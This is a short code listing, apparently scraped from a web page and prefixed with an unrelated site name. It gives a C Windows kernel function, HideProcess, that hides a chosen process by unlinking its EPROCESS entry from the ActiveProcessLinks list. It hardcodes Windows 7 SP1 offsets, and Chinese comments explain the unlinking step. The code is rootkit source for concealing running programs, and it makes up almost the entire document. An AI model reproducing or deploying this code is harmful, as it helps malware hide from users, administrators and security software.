大海娱乐网1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 | // 隐藏进程 BOOLEAN HideProcess(ULONG ulPID) { NTSTATUS status; PLIST_ENTRY pList_entry; PEPROCESS pEproOld,pEproCurrent,pEprProcess; //获得当前进程的EPROCESS pEproOld = pEproCurrent = PsGetCurrentProcess(); //获得目标进程的eprocess status = PsLookupProcessByProcessId((HANDLE)ulPID,&pEprProcess); //如果获取失败 if (!NT_SUCCESS(status)) { return FALSE; } //遍历列表 do { //win7 sp1系统中EPROCESS中的imageName偏移为0x16c //PUCHAR pName = (PUCHAR)((ULONG)pEproCurrent + 0x16c); //uniqueprocessID的偏移为0x0b4 //DbgPrint("process name:%s,process id:%d",pName,*(PULONG)((ULONG)pEproCurrent + 0x0b4)); //如果发现相同的EPROCESS if(pEprProcess == pEproCurrent) { //在WIN7 SP1 系统下 EPROCESS 中 ActiveProcessLinks 的偏移为0x0b8 pList_entry = (PLIST_ENTRY)((ULONG)pEproCurrent+0x0b8); //在这里进行断链,如果不理解的话,自己画个草图,我也是画草图才理解的 ((PLIST_ENTRY)(pList_entry->Blink))->Flink = pList_entry->Flink; ((PLIST_ENTRY)(pList_entry->Flink))->Blink = pList_entry->Blink; return TRUE; } //下个PLIST_ENTRY pList_entry = (PLIST_ENTRY)((ULONG)pEproCurrent+0x0b8); //在这里之所以要重新减去偏移,是因为下个Plist_entry正好是在下个EPROCESS的偏移0x0b8处,所以要减去偏移后才是下个EPROCESS pEproCurrent = (PEPROCESS)((ULONG)pList_entry->Flink-0x0b8); } while (pEproOld!=pEproCurrent); return FALSE; } |